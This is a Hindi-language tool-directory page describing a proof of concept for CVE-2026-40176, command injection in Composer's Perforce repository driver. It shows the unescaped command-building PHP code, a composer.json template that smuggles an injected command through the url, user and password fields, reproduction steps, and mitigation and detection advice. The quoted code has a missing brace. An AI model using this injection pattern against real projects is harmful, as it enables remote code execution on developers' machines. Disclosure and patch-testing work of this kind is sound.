Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

प्रूफ-ऑफ-कॉन्सेप्ट जो Composer के Perforce ड्राइवर (CVE-2026-40176) में कमांड इंजेक्शन प्रदर्शित करता है, जो क्राफ्टेड रिपॉजिटरी कॉन्फ़िगरेशन के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-40176

Composer Perforce रिपॉजिटरी रिमोट कोड एक्ज़ीक्यूशन (RCE)

Composer Version Severity Type


📋 सारांश

Composer के Perforce रिपॉजिटरी ड्राइवर में कमांड इंजेक्शन भेद्यता, जो रिपॉजिटरी URL प्रोसेसिंग में अपर्याप्त इनपुट सत्यापन के माध्यम से रिमोट कोड एक्ज़ीक्यूशन (RCE) की अनुमति देती है।


🎯 भेद्यता विवरण

PropertyValue
CVE IDCVE-2026-40176
प्रभावित संस्करणComposer < 2.2.27
भेद्यता प्रकारकमांड इंजेक्शन
हमला वेक्टरदुर्भावनापूर्ण रिपॉजिटरी कॉन्फ़िगरेशन
प्रभावमनमाना कोड एक्ज़ीक्यूशन
CVSS स्कोरउच्च/गंभीर

🔍 तकनीकी विवरण

यह भेद्यता इस बात में मौजूद है कि Composer perforce प्रकार होने पर कैसे प्रोसेस करता है। शेल कमांड में पास करने से पहले पैरामीटर को ठीक से सैनिटाइज़ नहीं किया जाता है, जिससे हमलावर मनमाना सिस्टम कमांड इंजेक्ट कर सकते हैं।

root@kitploit:~

    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

इसमें से कुछ भी ठीक से एस्केप नहीं किया गया था, जिससे हमलावर perforce प्रकार वाले सभी फ़ील्ड के लिए दुर्भावनापूर्ण पेलोड बनाकर कमांड इंजेक्ट कर सकते हैं।

भेद्य कोड पैटर्न:

root@kitploit:~
{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 प्रूफ ऑफ कॉन्सेप्ट

इस रिपॉजिटरी में भेद्यता प्रदर्शित करने वाला एक कार्यशील प्रूफ-ऑफ-कॉन्सेप्ट शामिल है।

प्रोजेक्ट संरचना

root@kitploit:~
CVE-2026-40176/
├── composer.json              # दुर्भावनापूर्ण Perforce रिपॉजिटरी कॉन्फ़िग
├── vuln-composer.phar         # Composer 2.2.26 (भेद्य)
├── patched-composer.phar      # Composer 2.2.27 (पैच किया गया)
└── README.md                  # यह फ़ाइल

पुनरुत्पादन चरण

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone <repository-url>
cd CVE-2026-40176

2. Composer संस्करण सत्यापित करें

root@kitploit:~
php vuln-composer.phar --version
# आउटपुट: Composer version 2.2.26

php patched-composer.phar --version
# आउटपुट: Composer version 2.2.27

3. भेद्य संस्करण का परीक्षण करें

root@kitploit:~
php vuln-composer.phar install
# या
php vuln-composer.phar update

4. शोषण सत्यापित करें

root@kitploit:~
ls -la /tmp/pwned

5. पैच किए गए संस्करण का परीक्षण करें (विफल होना चाहिए)

root@kitploit:~
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# फ़ाइल मौजूद नहीं होनी चाहिए (भेद्यता पैच की गई है)

🛡️ शमन

तत्काल कार्रवाई

  1. Composer को संस्करण 2.2.27 या उसके बाद अपग्रेड करें:

    root@kitploit:~
    composer self-update --2.2.27
    # या
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. सभी composer.json फ़ाइलों की समीक्षा करें अज्ञात या संदिग्ध रिपॉजिटरी कॉन्फ़िगरेशन के लिए

  3. सप्लाई चेन ऑडिट करें - जांचें कि क्या कोई निर्भरता अविश्वसनीय रिपॉजिटरी को संदर्भित करती है

पहचान

root@kitploit:~
# अपना Composer संस्करण जांचें
composer --version

# अपने प्रोजेक्ट्स में Perforce रिपॉजिटरी खोजें
grep -r "perforce" */composer.json
टूल डाउनलोड करें